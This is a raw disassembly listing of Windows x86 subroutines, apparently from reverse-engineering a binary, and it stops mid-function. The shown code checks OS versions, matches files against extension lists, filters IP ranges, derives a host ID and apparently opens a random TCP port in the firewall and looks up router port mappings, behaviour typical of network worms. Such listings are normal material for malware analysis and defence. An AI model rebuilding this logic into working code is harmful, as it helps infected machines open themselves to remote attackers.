; Attributes: bp-based frame
sub_9A8A72 proc near ; CODE XREF: sub_9A8C1B+5E�p
pvarg = VARIANTARG ptr -38h
ThreadId = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebx]
push esi
lea ecx, [ebp+var_1C]
push ecx
xor esi, esi
push ebx
mov [ebp+var_1C], esi
call dword ptr [eax+2Ch]
mov eax, [ebp+var_1C]
cmp eax, esi
jz loc_9A8C18
lea edx, [ebp+var_14]
push edx
mov [ebp+var_8], esi
mov [ebp+var_14], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+1Ch]
mov eax, [ebp+var_14]
cmp eax, esi
jz short loc_9A8AC1
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push offset dword_9A2F98
push eax
call dword ptr [ecx]
mov eax, [ebp+var_14]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8AC1: ; CODE XREF: sub_9A8A72+36�j
cmp [ebp+var_8], esi
jz loc_9A8C0F
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantInit
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_9A8C06
push edi
loc_9A8AED: ; CODE XREF: sub_9A8A72+18D�j
cmp word ptr [ebp+pvarg.anonymous_0], 0Dh
jnz loc_9A8BE3
mov eax, dword ptr [ebp+pvarg.anonymous_0+8]
lea edx, [ebp+var_4]
push edx
push offset dword_9A2F88
mov [ebp+var_4], esi
mov ecx, [eax]
push eax
call dword ptr [ecx]
cmp [ebp+var_4], esi
jz loc_9A8BE3
mov eax, [ebx]
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_4]
mov [ebp+var_10], esi
push ebx
call dword ptr [eax+30h]
mov eax, [ebp+var_10]
cmp eax, esi
jz loc_9A8BDA
lea edx, [ebp+var_20]
push edx
mov [ebp+var_20], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
test byte ptr [ebp+var_20+1], 4
jz loc_9A8BD1
mov eax, [ebp+var_10]
lea edx, [ebp+var_18]
push edx
mov [ebp+var_18], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp [ebp+var_18], 8
jz short loc_9A8BD1
cmp [ebp+var_18], 9
jz short loc_9A8BD1
mov eax, [ebx]
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_4]
mov [ebp+var_C], esi
push ebx
call dword ptr [eax+28h]
mov eax, [ebp+var_C]
cmp eax, esi
jz short loc_9A8BD1
lea edx, [ebp+var_24]
push edx
mov [ebp+var_24], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp word ptr [ebp+var_24], si
jz short loc_9A8BC8
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push esi ; dwCreationFlags
call GetCurrentThreadId
push eax ; lpParameter
push offset sub_9A8A37 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread
push 64h ; dwMilliseconds
mov edi, eax
call Sleep
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
push esi ; dwExitCode
push edi ; hThread
call TerminateThread
push edi ; hObject
call CloseHandle
loc_9A8BC8: ; CODE XREF: sub_9A8A72+119�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8BD1: ; CODE XREF: sub_9A8A72+CF�j
; sub_9A8A72+E9�j ...
mov eax, [ebp+var_10]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8BDA: ; CODE XREF: sub_9A8A72+B8�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8BE3: ; CODE XREF: sub_9A8A72+80�j
; sub_9A8A72+9D�j
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantClear
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_9A8AED
pop edi
loc_9A8C06: ; CODE XREF: sub_9A8A72+74�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8C0F: ; CODE XREF: sub_9A8A72+52�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8C18: ; CODE XREF: sub_9A8A72+1B�j
pop esi
leave
retn
sub_9A8A72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9A8C1B(LPVOID)
sub_9A8C1B proc near ; DATA XREF: sub_9A8CAF+50�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ppv = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 14h
push offset stru_9A2FC8
call __SEH_prolog
push 6 ; dwCoInit
xor esi, esi
push esi ; pvReserved
call CoInitializeEx
mov [ebp+var_20], eax
cmp eax, 80010106h
jz short loc_9A8C40
cmp eax, esi
jl short loc_9A8C9A
loc_9A8C40: ; CODE XREF: sub_9A8C1B+1F�j
push esi ; pReserved3
push esi ; dwCapabilities
push esi ; pAuthList
push 3 ; dwImpLevel
push 4 ; dwAuthnLevel
push esi ; pReserved1
push esi ; asAuthSvc
push 0FFFFFFFFh ; cAuthSvc
push esi ; pSecDesc
call CoInitializeSecurity
mov [ebp+ms_exc.disabled], esi
mov [ebp+ppv], esi
lea eax, [ebp+ppv]
push eax ; ppv
push offset riid ; riid
push 17h ; dwClsContext
push esi ; pUnkOuter
push offset rclsid ; rclsid
call CoCreateInstance
mov [ebp+var_24], eax
mov ebx, [ebp+ppv]
cmp ebx, esi
jz short loc_9A8C87
call sub_9A8A72
mov eax, [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8C87: ; CODE XREF: sub_9A8C1B+5C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9A8C9A
; ---------------------------------------------------------------------------
loc_9A8C8D: ; DATA XREF: .text:stru_9A2FC8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A8C91: ; DATA XREF: .text:stru_9A2FC8�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor esi, esi
loc_9A8C9A: ; CODE XREF: sub_9A8C1B+23�j
; sub_9A8C1B+70�j
cmp [ebp+var_20], esi
jl short loc_9A8CA5
call CoUninitialize
loc_9A8CA5: ; CODE XREF: sub_9A8C1B+82�j
xor eax, eax
call __SEH_epilog
retn 4
sub_9A8C1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A8CAF proc near ; CODE XREF: sub_9AEA12+6B�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
ThreadId = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
push edi
push 26h
pop ecx
xor eax, eax
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+78h+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
call GetVersionExA
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A8D31
cmp [ebp+78h+VersionInformation.dwMinorVersion], 1
jnz short loc_9A8CE9
cmp [ebp+78h+var_C], 2
jb short loc_9A8CF6
loc_9A8CE9: ; CODE XREF: sub_9A8CAF+31�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A8D31
cmp [ebp+78h+var_C], 1
jnb short loc_9A8D31
loc_9A8CF6: ; CODE XREF: sub_9A8CAF+38�j
push esi
lea eax, [ebp+78h+ThreadId]
push eax ; lpThreadId
xor esi, esi
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_9A8C1B ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread
mov edi, eax
push 3A98h ; dwMilliseconds
push edi ; hHandle
call WaitForSingleObject
cmp eax, 102h
jnz short loc_9A8D29
push esi ; dwExitCode
push edi ; hThread
call TerminateThread
loc_9A8D29: ; CODE XREF: sub_9A8CAF+70�j
push edi ; hObject
call CloseHandle
pop esi
loc_9A8D31: ; CODE XREF: sub_9A8CAF+2B�j
; sub_9A8CAF+3E�j ...
pop edi
add ebp, 78h
leave
retn
sub_9A8CAF endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8D37(char *lpFirst)
sub_9A8D37 proc near ; CODE XREF: sub_9A9E22+1C�p
; sub_9A9E95+64�p ...
lpFirst = dword ptr 4
push ebx
mov ebx, [esp+4+lpFirst]
push ebp
push edi
push 2Eh ; Ch
push ebx ; Str
xor ebp, ebp
call strrchr
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9A8DAE
push esi
xor esi, esi
loc_9A8D54: ; CODE XREF: sub_9A8D37+37�j
push ds:off_9B93F8[esi] ; lpSrch
push ebx ; lpFirst
call StrStrIA
test eax, eax
jnz short loc_9A8DAA
add esi, 4
cmp esi, 0D0h
jb short loc_9A8D54
jmp short loc_9A8D7C
; ---------------------------------------------------------------------------
loc_9A8D72: ; CODE XREF: sub_9A8D37+47�j
lea eax, [edi-1]
cmp byte ptr [eax], 2Eh
jz short loc_9A8D80
mov edi, eax
loc_9A8D7C: ; CODE XREF: sub_9A8D37+39�j
cmp edi, ebx
ja short loc_9A8D72
loc_9A8D80: ; CODE XREF: sub_9A8D37+41�j
xor ebx, ebx
loc_9A8D82: ; CODE XREF: sub_9A8D37+6F�j
lea esi, off_9B94C8[ebx]
push dword ptr [esi] ; Str
call strlen
push eax ; MaxCount
push dword ptr [esi] ; Str
push edi ; Str1
call _strnicmp
add esp, 10h
test eax, eax
jz short loc_9A8DAA
add ebx, 4
cmp ebx, 20h
jb short loc_9A8D82
jmp short loc_9A8DAD
; ---------------------------------------------------------------------------
loc_9A8DAA: ; CODE XREF: sub_9A8D37+2C�j
; sub_9A8D37+67�j
xor ebp, ebp
inc ebp
loc_9A8DAD: ; CODE XREF: sub_9A8D37+71�j
pop esi
loc_9A8DAE: ; CODE XREF: sub_9A8D37+18�j
pop edi
mov eax, ebp
pop ebp
pop ebx
retn
sub_9A8D37 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8DB4(u_long netlong)
sub_9A8DB4 proc near ; CODE XREF: sub_9A9BBC+42�p
; sub_9AE6A2+14B�p
netlong = dword ptr 4
push esi
push [esp+4+netlong]
xor esi, esi
call sub_9AB389
test eax, eax
pop ecx
jz short loc_9A8DF1
push [esp+4+netlong] ; netlong
call __imp_ntohl_0
xor ecx, ecx
loc_9A8DD1: ; CODE XREF: sub_9A8DB4+36�j
cmp eax, ds:dword_9A2FD8[ecx]
jb short loc_9A8DE1
cmp eax, ds:dword_9A2FDC[ecx]
jbe short loc_9A8DEE
loc_9A8DE1: ; CODE XREF: sub_9A8DB4+23�j
add ecx, 8
cmp ecx, 0C60h
jb short loc_9A8DD1
jmp short loc_9A8DF1
; ---------------------------------------------------------------------------
loc_9A8DEE: ; CODE XREF: sub_9A8DB4+2B�j
xor esi, esi
inc esi
loc_9A8DF1: ; CODE XREF: sub_9A8DB4+F�j
; sub_9A8DB4+38�j
mov eax, esi
pop esi
retn
sub_9A8DB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8DF5 proc near ; CODE XREF: sub_9A8FED+28�p
ppv = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+ppv], 0
and [ebp+var_4], 0
and dword ptr [edi], 0
push esi
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A3E9C ; riid
push 1 ; dwClsContext
push 0 ; pUnkOuter
push offset stru_9A3E8C ; rclsid
call CoCreateInstance
mov esi, eax
test esi, esi
jl short loc_9A8E43
mov eax, [ebp+ppv]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
test esi, esi
jl short loc_9A8E43
mov eax, [ebp+var_4]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
loc_9A8E43: ; CODE XREF: sub_9A8DF5+2D�j
; sub_9A8DF5+40�j
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A8E50
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8E50: ; CODE XREF: sub_9A8DF5+53�j
mov eax, [ebp+ppv]
test eax, eax
jz short loc_9A8E5D
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8E5D: ; CODE XREF: sub_9A8DF5+60�j
mov eax, esi
pop esi
leave
retn
sub_9A8DF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8E62 proc near ; CODE XREF: sub_9A8EDE+3C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
and dword ptr [esi], 0
mov ecx, [eax]
and [ebp+var_8], 0
and [ebp+var_C], 0
push ebx
lea edx, [ebp+var_C]
push edx
push eax
call dword ptr [ecx+48h]
mov ebx, eax
test ebx, ebx
jl short loc_9A8EBF
mov eax, [ebp+var_C]
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword ptr [ecx+28h]
test eax, eax
jl short loc_9A8EBD
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+4Ch]
mov ebx, eax
test ebx, ebx
jl short loc_9A8EBF
cmp [ebp+var_4], 0
jz short loc_9A8EBF
mov dword ptr [esi], 1
jmp short loc_9A8EBF
; ---------------------------------------------------------------------------
loc_9A8EBD: ; CODE XREF: sub_9A8E62+37�j
xor ebx, ebx
loc_9A8EBF: ; CODE XREF: sub_9A8E62+20�j
; sub_9A8E62+4A�j ...
mov eax, [ebp+var_8]
test eax, eax
jz short loc_9A8ECC
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8ECC: ; CODE XREF: sub_9A8E62+62�j
mov eax, [ebp+var_C]
test eax, eax
jz short loc_9A8ED9
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8ED9: ; CODE XREF: sub_9A8E62+6F�j
mov eax, ebx
pop ebx
leave
retn
sub_9A8E62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8EDE(int, int, OLECHAR *psz)
sub_9A8EDE proc near ; CODE XREF: sub_9A8FED+59�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
ppv = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
psz = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea ecx, [ebp+var_4]
mov edi, eax
mov eax, [edi]
xor ebx, ebx
push ecx
push edi
mov [ebp+var_14], ebx
mov [ebp+ppv], ebx
mov [ebp+var_C], ebx
call dword ptr [eax+28h]
test eax, eax
jl short loc_9A8F0F
cmp [ebp+var_4], bx
jz short loc_9A8F0F
mov eax, [edi]
push ebx
push edi
call dword ptr [eax+2Ch]
loc_9A8F0F: ; CODE XREF: sub_9A8EDE+22�j
; sub_9A8EDE+28�j
push [ebp+arg_4]
lea esi, [ebp+var_10]
push [ebp+arg_0]
mov eax, edi
call sub_9A8E62
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jl loc_9A8FC2
cmp [ebp+var_10], ebx
jnz loc_9A8FC2
mov eax, [edi]
lea ecx, [ebp+var_C]
push ecx
push edi
call dword ptr [eax+48h]
mov esi, eax
cmp esi, ebx
jl short loc_9A8FC2
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A3EBC ; riid
push 1 ; dwClsContext
push ebx ; pUnkOuter
push offset stru_9A3EAC ; rclsid
call CoCreateInstance
mov esi, eax
cmp esi, ebx
jl short loc_9A8FC2
mov eax, [ebp+ppv]
push [ebp+arg_0]
mov ecx, [eax]
push eax
call dword ptr [ecx+38h]
mov esi, eax
cmp esi, ebx
jl short loc_9A8FC2
mov eax, [ebp+ppv]
push [ebp+arg_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
mov esi, eax
cmp esi, ebx
jl short loc_9A8FC2
push [ebp+psz] ; psz
call SysAllocString
mov edi, eax
push edi ; BSTR
call SysStringLen
test eax, eax
jnz short loc_9A8FA2
mov esi, 8007000Eh
jmp short loc_9A8FC5
; ---------------------------------------------------------------------------
loc_9A8FA2: ; CODE XREF: sub_9A8EDE+BB�j
mov eax, [ebp+ppv]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+20h]
mov esi, eax
cmp esi, ebx
jl short loc_9A8FC5
mov eax, [ebp+var_C]
push [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+20h]
mov esi, eax
jmp short loc_9A8FC5
; ---------------------------------------------------------------------------
loc_9A8FC2: ; CODE XREF: sub_9A8EDE+47�j
; sub_9A8EDE+50�j ...
mov edi, [ebp+var_14]
loc_9A8FC5: ; CODE XREF: sub_9A8EDE+C2�j
; sub_9A8EDE+D2�j ...
push edi ; bstrString
call SysFreeString
mov eax, [ebp+ppv]
cmp eax, ebx
jz short loc_9A8FD9
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8FD9: ; CODE XREF: sub_9A8EDE+F3�j
mov eax, [ebp+var_C]
cmp eax, ebx
jz short loc_9A8FE6
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A8FE6: ; CODE XREF: sub_9A8EDE+100�j
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_9A8EDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8FED proc near ; CODE XREF: sub_9AEA12+59�p
psz = word ptr -18h
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
xor ebx, ebx
push 6 ; dwCoInit
push ebx ; pvReserved
mov [ebp+var_4], ebx
call CoInitializeEx
mov esi, eax
cmp esi, 80010106h
jz short loc_9A9011
cmp esi, ebx
jl short loc_9A9055
loc_9A9011: ; CODE XREF: sub_9A8FED+1E�j
push edi
lea edi, [ebp+var_4]
call sub_9A8DF5
test eax, eax
pop edi
jl short loc_9A9055
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+psz]
add edx, 5
push edx
push eax
call sub_9AB677
lea eax, [ebp+psz]
push eax ; psz
movzx eax, [ebp+arg_0]
push 6 ; int
push eax ; int
mov eax, [ebp+var_4]
call sub_9A8EDE
add esp, 14h
test eax, eax
jl short loc_9A9055
xor ebx, ebx
inc ebx
loc_9A9055: ; CODE XREF: sub_9A8FED+22�j
; sub_9A8FED+30�j ...
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A9062
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9062: ; CODE XREF: sub_9A8FED+6D�j
test esi, esi
jl short loc_9A906C
call CoUninitialize
loc_9A906C: ; CODE XREF: sub_9A8FED+77�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A8FED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9072 proc near ; CODE XREF: sub_9A932E+69�p
Str = byte ptr -104h
var_103 = byte ptr -103h
nSize = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push 3Fh
pop ecx
xor eax, eax
mov [ebp+Str], 0
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov esi, 100h
push esi ; namelen
lea eax, [ebp+Str]
push eax ; name
call gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_9A90C0
lea eax, [ebp+nSize]
push eax ; nSize
lea eax, [ebp+Str]
push eax ; lpBuffer
mov [ebp+nSize], esi
call GetComputerNameA
loc_9A90C0: ; CODE XREF: sub_9A9072+38�j
call sub_9AB343
push eax
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax
lea eax, [ebp+Str]
push eax
call sub_9A8245
mov esi, [ebp+Dest]
add esp, 0Ch
push eax
push offset a08x08x ; "%08x%08x"
push ebx ; Count
push esi ; Dest
call _snprintf
add esp, 14h
pop edi
mov byte ptr [esi+ebx-1], 0
pop esi
leave
retn
sub_9A9072 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A90FF(int, void *Count, int netshort, struct in_addr in)
sub_9A90FF proc near ; CODE XREF: sub_9A9289+45�p
; sub_9A932E+52�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Memory = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
Count = dword ptr 0Ch
netshort = dword ptr 10h
in = in_addr ptr 14h
push 20h
push offset stru_9A3ED8
call __SEH_prolog
mov eax, dword ptr [ebp+in.S_un]
xor esi, esi
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov [ebp+var_28], eax
cmp eax, esi
jz short loc_9A912E
push eax ; in
call inet_ntoa
push eax ; Src
call _strdup
pop ecx
jmp short loc_9A9130
; ---------------------------------------------------------------------------
loc_9A912E: ; CODE XREF: sub_9A90FF+1C�j
xor eax, eax
loc_9A9130: ; CODE XREF: sub_9A90FF+2D�j
mov [ebp+Memory], eax
push esi ; int
push esi ; int
push eax ; cp
push 7D0h ; int
call sub_9B4EE4
add esp, 10h
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_9A9179
mov ecx, eax
loc_9A914C: ; CODE XREF: sub_9A90FF+56�j
mov [ebp+var_20], ecx
cmp ecx, esi
jz short loc_9A9157
mov ecx, [ecx]
jmp short loc_9A914C
; ---------------------------------------------------------------------------
loc_9A9157: ; CODE XREF: sub_9A90FF+52�j
push 10h ; int
push [ebp+netshort] ; netshort
push [ebp+Count] ; Count
push [ebp+arg_0] ; int
push eax ; int
call sub_9B4B6B
add esp, 14h
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_9A9179
mov [ebp+var_1C], 1
loc_9A9179: ; CODE XREF: sub_9A90FF+49�j
; sub_9A90FF+71�j
push [ebp+Memory] ; Memory
call free
pop ecx
jmp short loc_9A918C
; ---------------------------------------------------------------------------
loc_9A9185: ; DATA XREF: .text:stru_9A3ED8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9189: ; DATA XREF: .text:stru_9A3ED8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A918C: ; CODE XREF: sub_9A90FF+84�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A90FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9199(int, char *Str2)
sub_9A9199 proc near ; CODE XREF: sub_9A932E+7C�p
Dest = byte ptr -0F8h
Str1 = byte ptr -0B8h
var_68 = dword ptr -68h
var_58 = dword ptr -58h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
Memory = byte ptr -34h
var_2F = byte ptr -2Fh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
Str2 = dword ptr 0Ch
push 0E8h
push offset stru_9A3EF0
call __SEH_prolog
mov edi, ecx
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_1C], ebx
loc_9A91B2: ; CODE XREF: sub_9A9199+D7�j
push [ebp+var_1C]
push offset aD ; "%d"
push 6 ; Count
lea eax, [ebp+Memory]
push eax ; Dest
call _snprintf
mov [ebp+var_2F], bl
mov [ebp+Dest], bl
mov byte ptr [ebp+var_44], bl
mov byte ptr [ebp+var_58], bl
mov [ebp+Str1], bl
mov byte ptr [ebp+var_28], bl
mov byte ptr [ebp+var_3C], bl
mov byte ptr [ebp+var_68], bl
mov esi, [ebp+arg_0]
add esi, 484h
lea eax, [ebp+var_58]
push eax ; int
lea eax, [ebp+Dest]
push eax ; Dest
lea eax, [ebp+var_44]
push eax ; int
lea eax, [ebp+Str1]
push eax ; int
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_3C]
push eax ; int
lea eax, [ebp+var_68]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+Memory]
push eax ; Memory
push esi ; int
push dword ptr [edi] ; Str
call sub_9B5636
add esp, 3Ch
mov [ebp+var_2C], eax
cmp eax, ebx
jnz short loc_9A926A
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9A926A
push offset aTcp ; "TCP"
lea eax, [ebp+var_20]
push eax ; Str1
call _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9A926A
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
push esi ; int
push dword ptr [edi] ; Str
call sub_9B5561
add esp, 10h
mov [ebp+var_48], eax
loc_9A926A: ; CODE XREF: sub_9A9199+8E�j
; sub_9A9199+A4�j ...
inc [ebp+var_1C]
cmp [ebp+var_2C], ebx
jz loc_9A91B2
jmp short loc_9A927F
; ---------------------------------------------------------------------------
loc_9A9278: ; DATA XREF: .text:stru_9A3EF0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A927C: ; DATA XREF: .text:stru_9A3EF0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A927F: ; CODE XREF: sub_9A9199+DD�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9A9199 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9289(int, int, struct in_addr in)
sub_9A9289 proc near ; CODE XREF: sub_9ACABE+115�p
Count = byte ptr -74Ch
var_2C8 = dword ptr -2C8h
Str = dword ptr -48h
netshort = byte ptr -3Ch
var_3B = byte ptr -3Bh
Dest = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
in = in_addr ptr 10h
push 73Ch
push offset stru_9A3F00
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+netshort], bl
xor eax, eax
lea edi, [ebp+var_3B]
stosd
stosd
stosd
stosw
stosb
mov [ebp+Dest], bl
xor eax, eax
lea edi, [ebp+var_2B]
stosd
stosd
stosd
stosw
stosb
push dword ptr [ebp+in.S_un] ; in
lea eax, [ebp+netshort]
push eax ; netshort
lea eax, [ebp+Count]
push eax ; Count
lea eax, [ebp+Str]
push eax ; int
call sub_9A90FF
add esp, 10h
test eax, eax
jz short loc_9A9321
lea eax, [ebp+Dest]
push eax ; Dest
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+Str] ; Str
call sub_9B5353
add esp, 0Ch
cmp [ebp+Dest], bl
jz short loc_9A9321
lea eax, [ebp+netshort]
push eax ; cp
mov esi, __imp_inet_addr
call esi ; __imp_inet_addr
mov ecx, [ebp+arg_0]
mov [ecx], eax
lea eax, [ebp+Dest]
push eax ; cp
call esi ; __imp_inet_addr
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ebp+var_1C], 1
jmp short loc_9A9321
; ---------------------------------------------------------------------------
loc_9A931A: ; DATA XREF: .text:stru_9A3F00�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A931E: ; DATA XREF: .text:stru_9A3F00�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9321: ; CODE XREF: sub_9A9289+4F�j
; sub_9A9289+6A�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A9289 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A932E(__int16, int, struct in_addr in)
sub_9A932E proc near ; CODE XREF: sub_9ACABE+186�p
Count = dword ptr -78Ch
var_308 = dword ptr -308h
var_88 = byte ptr -88h
Str2 = dword ptr -78h
var_58 = dword ptr -58h
netshort = dword ptr -50h
Str = dword ptr -40h
var_34 = dword ptr -34h
Dest = byte ptr -30h
var_2B = byte ptr -2Bh
var_28 = dword ptr -28h
var_23 = byte ptr -23h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
in = in_addr ptr 10h
push 77Ch
push offset stru_9A3F10
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+ms_exc.disabled], ebx
mov byte ptr [ebp+netshort], bl
xor eax, eax
lea edi, [ebp+netshort+1]
stosd
stosd
stosd
stosw
stosb
movzx eax, [ebp+arg_0]
push eax
push offset aU ; "%u"
push 6 ; Count
lea eax, [ebp+Dest]
push eax ; Dest
mov edi, _snprintf
call edi ; _snprintf
mov [ebp+var_2B], bl
push dword ptr [ebp+in.S_un] ; in
lea eax, [ebp+netshort]
push eax ; netshort
